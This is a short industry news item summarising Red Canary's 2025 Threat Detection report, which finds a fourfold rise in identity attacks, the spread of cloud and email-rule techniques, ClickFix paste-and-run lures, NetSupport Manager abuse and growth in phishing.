MDR firm Red Canary published its seventh annual Threat Detection report, which examines the trends, cyber threats and adversary techniques that organizations should prioritize in the coming months and years. The report tracks MITRE ATT&CK techniques that adversaries most frequently abuse. This year noted 4X as many identity attacks, as compared to the 2024 edition. After debuting in the top 10 (2024), cloud-native and identity-enabled techniques surged in this year’s report, with cloud accounts, email forwarding rule and email hiding rules ranking among the top five.
“2024 marked the rise of cloud-native and identity-enabled attacks, with three of the top five techniques we detected falling into these categories,” said Keith McCammon, co-founder and CSO, Red Canary. ”This highlights the immense value adversaries place on identities – compromise one, and they gain access to countless systems. Unfortunately, the rise of identity and access management (IAM) and identity providers hasn’t deterred adversaries. Instead, it has made centralized identities even more lucrative targets as once compromised, adversaries can gain access to numerous disparate systems. Organizations must recognize identities as a frontline for defense and strengthen their security posture to stay ahead of adversaries.”
The data that powers Red Canary’s report is not mere software signals; this data set is the result of hundreds of thousands of investigations across millions of protected systems and identities. Each of the threats Red Canary detected in 2024 were not prevented by the customers’ expansive security controls. They are the result of a breadth and depth that Red Canary leverages to detect the threats that would otherwise go undetected.
Red Canary’s 2025 report provides in-depth analysis of nearly 93,000 threats detected within more than 308 petabytes of security telemetry from customers’ endpoints, networks, cloud infrastructure, identities and SaaS applications, over the past year. The total number of threats detected increased by more than a third compared to 2024’s report as a result of not only more customers, but also Red Canary’s expanded visibility into cloud and identity infrastructure.
Analysis shows that while the threat landscape continues to shift and evolve, adversaries’ motivations do not. The tools and techniques they deploy remain consistent, with some notable exceptions.
Key findings include:
- One of the most successful new initial access techniques observed this year was paste and run, also known as “ClickFix” and “fakeCAPTCHA.”
- Organizations in the educational services sector accounted for 63 percent of all VPN use, a disproportionately high share given their smaller presence among Red Canary’s data.
- Red Canary saw malicious use of NetSupport Manager break its yearly top 10, highlighting the popularity of RMM tools amongst adversaries.
- Email, QR code (aka “quishing”), SMS and voice phishing attacks all increased in 2024.
